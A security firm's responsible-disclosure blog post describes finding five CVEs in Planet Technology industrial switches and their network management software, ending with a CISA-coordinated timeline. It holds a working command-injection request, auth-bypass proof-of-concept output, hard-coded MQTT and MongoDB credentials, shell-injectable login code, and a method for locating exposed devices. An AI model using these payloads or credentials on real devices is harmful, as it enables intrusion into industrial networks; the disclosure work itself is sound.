Responsible Disclosures
April 25, 2025

How We Discovered Planet Technology Network Device Vulnerabilities

Cybersecurity Threats
Threat Modelling
Causes of Vulnerabilities
Contributors
Senior Director Cyber Threat Research
Immersive
Share

I’ve recently been on a hardware bug-hunting kick, picking up new skills and learning or creating new tools with a focus on hardware reverse engineering for IoT and embedded devices (mainly routers, as they’re pretty easy to get hold of). I’ve also spent the last few months looking at operational technology (OT) and industrial control systems (ICSs) to create cyber ranges and training environments. These passions led to an unexpected cybersecurity discovery.

Back in December, I spotted an advisory for a couple of vulnerabilities in a set of industrial network switches from a manufacturer in Taiwan, Planet Technology. There were no technical details at the time of the release, and I had no other active research as we wound into the festive period.

I wanted to see if I could replicate the findings blindly. With just the advisory to go on, would I be able to locate the vulnerabilities, and could I write a proof of concept (POC) to exploit them? 

You can do a lot with emulation these days, but I still prefer to have the physical devices so I can get as close to the real-world behavior as possible. Plus, it opens up some other avenues like universal asynchronous receive and transmit (UART) logging, or grabbing firmware from the device itself if the vendor doesn't have it available or it's encrypted.

It took a few weeks. But, after some delays and some shipping issues, I found myself the owner of two brand-new, in-box Planet Technology switches.

The setup

The setup was pretty simple. My home lab has a separate isolated network with an ESXI server that runs my reverse engineering (RE) environment, Kali, Burp, etc., as well as a few conveniences like a network tap to make sure I can capture all the packets from the physical side – not just the mirror on the switches.

With everything powered up from the bench power supply and connected to the network, I powered on and ran the first time setup to make sure the devices were functional. Then I could start testing.

TL;DR

To shorten what’s already going to be a long post, I was successful in identifying the vulnerabilities from the CISA report. But I also spotted a couple of other vulnerabilities, not just in these switches (and likely other models), but also in the network management tool that’s used to remotely manage whole fleets of Planet devices in organizations.

If you’re looking for a summary of the CVEs and their potential impacts, check out this blog post.

Getting the firmware

Starting with the switches, it was pretty easy to get hold of the firmware, as it’s provided as a download on the vendor's site. For each switch, I grabbed the latest firmware and updated both switches. (The firmware for each switch was practically identical, with only very minor differences.)

Having validated the previous findings, I wanted to ensure that anything new I found wasn’t also patched as part of the other disclosure. Specifically:

WGS-80-HPT-V2 = 2.305b250121

WGS-4215-8T2S = 1.305b241115

With the firmware loaded and tested, it was time to get into the weeds. Unpacking the zip archive from the vendor’s site, I found a .bix file. BIX is a less commonly used compression format used for packing firmware. Thankfully, BIX is just GZIP, so it was pretty easy for me to extract with a tool like 7-Zip.

Unpacking the BIX archive, I got a single file, vmlinux_org.bin. For this one, I turned to binwalk.

Note: Binwalk v3 has been released and is a significant improvement over earlier versions. If you haven’t already updated, I’d make the transition. It’s an easy installation using crates, and is significantly quicker and less prone to false positives.

Binwalk gives two results: a very old Linux kernel and another GZIP compressed section, which most likely holds the file system.

I ran binwalk again with the -e -M  flags to recursively extract and scan the sections. This quickly provided several sets of files.

Looking at the extracted file system, there was a lot. It would take a while to review everything manually.

Automating the boring stuff

This is where I like automation. I want to look for low-hanging fruit, and most of the “fun” things are probably going to be in the binary files.

I wrote a Python script to automate a few of the more manual steps. It:

  • Scans a given directory for any ELF binaries
  • Creates a Ghidra project
  • Loads each ELF file and runs Ghidra’s default analysis
  • Searches for a set of functions and xrefs
  • If a function and xref is found, the decompiled code is written to a directory

The script found a few system calls across a few of the web CGI files. These were definitely of interest, as it’s possible they could be accessed from the web graphical user interface (GUI).

Checking the code directory that the script created for me, a couple of these function call results jump out as immediately interesting.

I needed to review this properly in Ghidra, but at first glance, this looks like a classic command injection vulnerability.

Spoiler! This is the first new vulnerability, CVE-2025-46272, a post-auth command injection vulnerability.

So I had something that looked interesting. From a cursory review of the code, it looks like it should be vulnerable, but I wasn’t yet sure if any sanitization had happened earlier in the process.

The easiest way is to test this dynamically in a tool like Burp. But first, I had to find out where this page was in the application.

As it turns out, this function wasn’t actually available from the menus in the application. It might have been a leftover tool or maybe a function for another switch that shares the same code base. Either way, the function exists, and I could manually navigate to it.

Without going too deep, the web application uses a cmd value to determine which page to load. In this instance, looking at the code, you can see that the function loads a new page dispatcher.cgi?cmd=%d. You can also see that 0x214 or 532 gets passed to this URL string. This is what I used to find the “hidden page”.

Grabbing the cmd value for this page, I opened it in a browser and got my first look at the trace route page.

Then it was time to load up Burp to see if I could get a command injection here.

Turns out – yes! 

http://172.21.1.100/cgi-bin/dispatcher.cgi?cmd=532&ip_URL=; echo `ps -w`&tr_maxhop_URL=30&

The accidental auth bypass

I don't even know how I found this one, other than to say dumb luck played a large part in it. 

I’d spent hours across many days reading decompiled C and tracing through functions in Ghidra to see if there were any other critical issues. But I needed to switch my focus – there’s only so long you can stare at Ghidra before madness starts to creep in! Well, that’s to say it’s much better to step back, look at something else, and let your subconscious recover to process things in the background.

So I took to Burp and started looking for logic flaws or bugs in the auth flows and file uploads. Could I abuse these to get a shell on the host or bypass the login flow?

As you probably guessed from this very leading statement, both of these things turned out to be true! This was the second vulnerability, CVE-2025-46275, an auth bypass on WGS switches, which chained quite nicely with the OS command injection vulnerability.

I was in Burp Repeater looking at the uploader for the configuration file. I was tampering with some header fields and accidentally deleted the cookie from the header when I was removing some of the browser-populated values. I sent the POST request, and it was successful.

It was actually the next day when I realised what I had done. After powering everything back up and returning to Burp, I jumped straight into the repeater that I’d left open and just hit send. To my surprise, it just worked!

The session files are stored in /tmp, which gets emptied out on reboot, so this attempt should have redirected me to the login page. But it didn't; it was successful!

First request with the session cookie
Second request with the session cookie removed

There are many vectors here with auth bypass on file upload. I could have flashed custom firmware to take complete control over the device (I might save this one for a later blog post…) or I could have manipulated the configuration to change how the device operates.

For the sake of a clean and impactful PoC, I decided to go with creating a new admin account. 

To simplify this process, I also created a PoC script in Python that automates the process and creates an admin account for you.


┌──(kali㉿kali)-[~/planet]
└─$ python3 planet-auth-bypass.py 172.21.1.100 manager newpassword
[+] Creating a new admin account on the switch
	[-] Username: manager
	[-] Password: newpassword[+] Sending the request to the switch
[+] Success Your new account exists, you can log in now
	[-] This is the running config and will be lost on reboot
	[-] You can also use SSH
Code Copied

By choosing to write to the running config, my account is ephemeral. If the device is rebooted without first committing the running config to the startup config, the account will disappear without a trace. This is easy to change, and I could commit my new account to the startup config just as easily.

This remote management looks interesting… 

Jumping back into the decompiled C code, another binary stood out to me as interesting. I spotted it in the web user interface as well.

I saw remote NMS configuration and a binary named nms_agent. Digging through the decompiled binary, a few things jumped out pretty quickly:

  • There are two options for remote management: Planet Cloud or a local network management device.
  • The NMS service uses MQTT to send and receive messages.
  • If you’re using a local network management device, the MQTT defaults to client:client as the username and password.

Rabbit hole, here we come!

To test this, I really needed a local NMS. But they aren’t cheap or quick to get hold of, and couldn’t justify buying one on a “what if”. Fortunately, the answer came in a virtual machine.

As I was browsing the planet.com.tw site, I came across the UNI-NMS-LITE, a virtual machine with a software-based NMS that, by all appearances, operated the same way as the hardware devices, just with a limited set of features.

This was pretty easy to deploy out to the ESXI server in the range and get up and running.

You guessed it! This was the third vulnerability, CVE-2025-46273, hard-coded credentials for the NMS and connected clients.

Mosquito

With a local NMS connected to the network and each of the switches configured and communicating, it was time to see what I could do without hard-coded credentials.

My go-to tool for quickly reviewing MQTT servers is MQTT Explorer. It’s cross-platform and pretty easy to configure.

Normally, when using a protocol like MQTT, you need to subscribe to specific channels to see what traffic is being sent. Fortunately for me, it appeared that our MQTT setup automatically subscribes to channels, meaning every time a device communicates with the MQTT server or the NMS server sends a command to a managed device, we also get a copy of the data.

The impact of this vulnerability depends on the types of devices being managed and their capabilities. At best, this is an information gold mine for threat actors, discovering all the assets and their configurations. At worst, attackers can publish messages to devices that will override their configuration.

Following the lead

Having gained access to the MQTT server, I was now interested in what other issues might be affecting the NMS server. Running a quick nmap scan to see what was open and listening, I found the MQTT port as expected, but I also found MongoDB listening.

This was interesting, as the setup process hadn’t asked me to configure any secrets other than the initial account. That suggested that the MongoDB database could be using hard-coded credentials in the same way the MQTT server was, and as it was publicly exposed, that would be bad!

To prove this, I first needed to gain access to the code on the server. To do this, I could grab the firmware from the vendor’s website, but they only provide an encrypted copy (and we don’t have the keys… yet!). I wanted access, so I had to get it from the device itself.

I used the credentials in the installation guide, but got a fairly restricted shell.

Please enter your choice:
1) View IP Status      4) Factory Default     7) Shutdown
2) Ping                5) Logout              8) System Information
3) Restart Network     6) Reboot
Please enter your choice: 

While I could have tried to escape this shell, there was actually an easier option. As this is a virtual machine and I had physical access to both the console and the disk images, it was trivial to get a root shell using a well-known Linux recovery technique. 

First, I booted into grub, then modified the grub boot arguments to include init=/bin/bash. This will result in the OS booting into bash as the root user, bypassing any auth requirements. 

From here, I mounted the filesystem as rw for read/write and edited the /home/adminuser/.bashrc file, which is where our limited command line interface (CLI) was being executed. 

As an added bonus, I ran sudo su to get a root shell every time I SSHed in.

As root, I was able to access the web application and everything else that’s running on the NMS, including the encryption keys used to decrypt the firmware upgrade bundle. 

The main bulk of the NMS application was written in Python, a language I’m pretty comfortable with, making analysis here a little bit easier than it was with the compiled C.

I started by looking for the Mongo credentials (opening the web app in an IDE that knows Python also makes this a lot easier), and after a quick search I found the hard coded credentials!


def connect_db():  import pymongo  from pymongo import MongoClient
# Define MongoClient in pymongo module  client =
MongoClient('mongodb://planet:123456@localhost:27017/controller')# Connect to mongodb/controller with
user:'planet' and passwd:'123456'  return client
Code Copied

This was the penultimate vulnerability, CVE-2025-46274, hard-coded Mongo credentials. 

It’s important to note that actually connecting to the Mongo service remotely wasn’t as simple as point and click. The Mongo version running on the NMS is very old (v2.6.10) and any modern Mongo client outright refuses to connect. Installing an older version on a modern Linux system is also pretty painful. You can’t even pull the Docker container for 2.6.10 as the schema is deprecated and disabled.

With access to the Mongo database I had full control over the NMS and full access to information on every managed device. This included any configured simple network management protocol (SNMP) secrets and simple mail transfer protocol (SMTP) credentials if notifications are enabled.

Where are the user accounts?

I was now looking at the collections and documents in the Mongo database. While I could find credentials for managing the devices, the credentials for logging in to the NMS or NMS user accounts weren’t in the Mongo database. Were they being stored somewhere else? 

Jumping back in to Burp, I sent a login request to see where it was going, so I could then grab the matching file and check the authentication flows. 

login.py was easy enough to find in the integrated development environment (IDE); I immediately saw what I was looking for.

This app used a .htpasswd file to manage the authentication – a strange choice given that there’s a database connected to the app, but there is a bigger concern! The way the credentials are being validated is open to abuse. 


def isValidLogin(username, password):
	if localDebug:
		print(username, password)
	p = subprocess.check_output("grep "+username+" /etc/apache2/.htpasswd |
cut -d$ -f3", shell=True).decode()
	if len(p)==0:
		return False #Wrong Username
	salt = p.strip()
	try:
    	p = subprocess.check_output("openssl passwd -apr1 -salt "+str(salt)
+" "+password.encode().hex(), shell=True).decode()
	except Exception as inst:
		if localDebug:
			print(sys._getframe().f_lineno, str(inst))
		return False
	passwd = p.strip()
    cmd = "grep '"+username+":"+passwd+"' /etc/apache2/.htpasswd -c\n"
	try:
		p = subprocess.check_output(cmd, shell=True).decode()
		if int(p)==0:
			return False
		return True
	except Exception as inst:
		if localDebug:
			print(sys._getframe().f_lineno, str(inst))
		return False
Code Copied


The application uses OS system calls and string concatenation to create the commands and read the response. The worst issue with this approach is that the user's input isn’t sanitized before being passed to the system call.

It's blind command injection, but using Burp to tamper with the request and my SSH access to the host, I could confirm a valid injection.

This was our final finding, CVE-2025-46271, a pre-auth command injection vulnerability. If you can access the login page, you can get a remote shell. You drop in as the www-data user account, which is a limited account. However, there are a number of potential routes that would likely result in gaining root-level permissions.

In the wild

To really know the impact of a vulnerability when a public disclosure is made, you need to understand:

  • How widespread the hardware is distributed across the globe
  • If they are connected to the internet, as this directly translates to exposure

My two go-to tools for this type of search are Shodan.io and Censys.io.

Censys.io has recently released a new version of its portal that makes searching significantly easier. I now had to try and find out how to fingerprint the devices.

I took two approaches here. The first was a bit of a scatter-gun approach that would find likely Planet devices, but wouldn't be able to validate the version (and could pick up other devices).

This first search was for a web path dispatcher.cgi and the server software hydra. This resulted in around 5,000 results.

A scan showed these were definitely Planet devices – or they at least shared the same URL structure, server software, and HTML title – but from the results, it was difficult to tell what devices they were specifically.

The second search was more specific. Censys allows you to search using the SHA256 of the HTML. This should be pretty effective as the default pages for both switches were static with no dynamically-generated elements like a timestamp. This was an easy search with two steps:

  • Get the SHA of the landing page with curl http://172.21.1.100 | sha256sum
  • Search for the resulting hash

808 results this time round! Again, it was hard to identify specific versions, but there were going to be Planet switches, most likely in the WGS series.

I made a lot of assumptions when reviewing these results, especially using passive tools like Shodan and Censys. With more active recon, it’s possible to fingerprint the specific versions and identify internet-connected devices that would be vulnerable to the CVEs detailed here. But that’s outside the scope of this report.

It all ended with a CISA advisory

By now, it had been a few months since I’d first started down this path, given the festive period, a full-time day job, and that this kind of research was something I do for “fun”. I had to move on to other projects!

I’m a big fan of responsible disclosure, regardless of bug bounty programs. And, given the scope and potential impact of these findings, I wanted to ensure that they were fixed. If I could find them, then threat actors looking to target these sectors could also find them. 

I had no idea how to contact Planet.com.tw, but as this had all started with a CISA advisory, I figured that would be a sensible approach for me to take as well. So I emailed CISA and asked for their help. A couple of days later, I had my response. 

Good afternoon Mr. Breen,

Thank you for reaching out to us, we would be eager to coordinate with you to disclose these vulnerabilities.

We utilize a secure platform called VINCE to coordinate with researchers and vendors.

Thanks to the support from CISA, I was able to contact the team at Planet Technology. They responded really well to the reports and were open to feedback and discussion about the impact of some of the findings.

Here’s a full timeline of the disclosure process. You can find the official CISA advisory here.

February 23, 2025 // Immersive contacts CISA for support with disclosure to Planet Technology

March 6, 2025 // CISA coordinates with Planet Technology and Immersive via VINCE

March 7, 2025 // Vendor confirms findings

April 16, 2025 // Vendor releases patches

April 24, 2025 // CISA publishes advisory

Trusted by top
companies worldwide

Customer
Insights

The speed at which Immersive produces technical content is hugely impressive, and this turnaround has helped get our teams ahead of the curve, giving them hands-on experience with serious vulnerabilities, in a secure environment, as soon as they emerge.
TJ Campana
Head of Global Cybersecurity
Operations, HSBC

Ready to Get Started?
Get a Live Demo.

Simply complete the form to schedule time with an expert that works best for your calendar.